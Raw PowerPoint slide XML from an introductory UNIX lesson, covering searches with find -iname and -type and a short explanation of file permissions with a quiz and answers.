          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Unless you are searching for an EXACT filename, you need to put your criteria in quotes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To search for files containing a search term:</a:t>
            </a:r>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err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> “*search-term*”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For specific file types:</a:t>
            </a:r>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err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> “*.txt” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>#Will find all text files in the current 					directory or subdirectories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“*” Means to match anything. So in the first example, we are looking for file names containing “search-term” regardless of where it occurs in the name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>In the second example, we only allow anything in the beginning of the file name, but the name of the file has to end in “.txt”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3963031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UNIX?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="4952523" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A family of multitasking, multiuser operating systems that derive from the original AT&amp;T UNIX operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNIX-based/UNIX-like systems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for linux distr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910" y="4425949"/>
            <a:ext cx="44386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macxdvd.com/mac-dvd-video-converter-how-to/article-image/mac-os-x.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="32545" t="25403" r="31091" b="14161"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5581173" y="3934459"/>
            <a:ext cx="1905001" cy="23774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media.psu.com/media/articles/image/orbis2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="21597" t="25219" r="19236" b="26281"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6251894" y="563646"/>
            <a:ext cx="1699100" cy="9285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tatic.giantbomb.com/uploads/original/15/157771/2312719-a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976" r="8762"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7254239" y="1750614"/>
            <a:ext cx="1752600" cy="159789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www.degree53.com/~/media/images/services/ios.ashx?h=500&amp;la=en&amp;w=500"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="26813" t="5280" r="23586" b="6240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7738586" y="4253110"/>
            <a:ext cx="1154113" cy="20587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upload.wikimedia.org/wikipedia/en/thumb/d/d0/Chrome_Logo.svg/1024px-Chrome_Logo.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1173" y="1749622"/>
            <a:ext cx="1599883" cy="1599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4278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4.1: Find &lt;criteria&gt;</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We can also search specifically for files OR folders</a:t>
            </a:r>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err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;search-term&gt; -type f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>#For Files</a:t>
            </a:r>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err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;search-term&gt; -type d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>#For directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>So if we wanted to find all files in exercise3 containing the word “mount” in their name:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385887" y="4293433"/>
            <a:ext cx="6372225" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29615131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4.2: Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825624"/>
            <a:ext cx="7886700" cy="4800027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Control who can access, modify, and execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>files/folders </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Protects you from malicious code (and accidents)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Protects the server from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Permissions: Read, Write, Execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Read (r): Can see what’s inside a file/directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Write (w): Can edit/write in a file, and create files in a directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Execute (x): Can run the file from the console</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12028942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Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3275351"/>
            <a:ext cx="7886700" cy="2901612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First character is the type; d = directory, - = file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First 3: Owner permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Second 3: Group permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Last 3: Global permissions (anyone anywhere)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1570375"/>
            <a:ext cx="8033047" cy="1412667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771993" y="2315980"/>
            <a:ext cx="329784" cy="19487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05670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Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3275351"/>
            <a:ext cx="7886700" cy="2901612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First character is the type; d = directory, - = file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First 3: Owner permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Second 3: Group permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Last 3: Global permissions (anyone anywhere)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1570375"/>
            <a:ext cx="8033047" cy="1412667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1056803" y="2315980"/>
            <a:ext cx="329784" cy="19487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9978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Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3275351"/>
            <a:ext cx="7886700" cy="2901612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First character is the type; d = directory, - = file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First 3: Owner permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Second 3: Group permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Last 3: Global permissions (anyone anywhere)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1570375"/>
            <a:ext cx="8033047" cy="1412667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1349108" y="2315980"/>
            <a:ext cx="329784" cy="19487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33014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Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3275351"/>
            <a:ext cx="7886700" cy="2901612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First character is the type; d = directory, - = file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First 3: Owner permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Second 3: Group permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Last 3: Global permissions (anyone anywhere)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1570375"/>
            <a:ext cx="8033047" cy="1412667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1349108" y="2315980"/>
            <a:ext cx="329784" cy="19487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50247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Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3275351"/>
            <a:ext cx="7886700" cy="2901612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions do YOU have in 20170301-unix-basic?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does GROUP have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does EVERYONE have?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1570375"/>
            <a:ext cx="8033047" cy="1412667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12852159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Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3275351"/>
            <a:ext cx="7886700" cy="2901612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions do YOU have in 20170301-unix-basic?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	All permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does GROUP have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Read and execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What permissions does EVERYONE have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Read and execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1570375"/>
            <a:ext cx="8033047" cy="1412667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
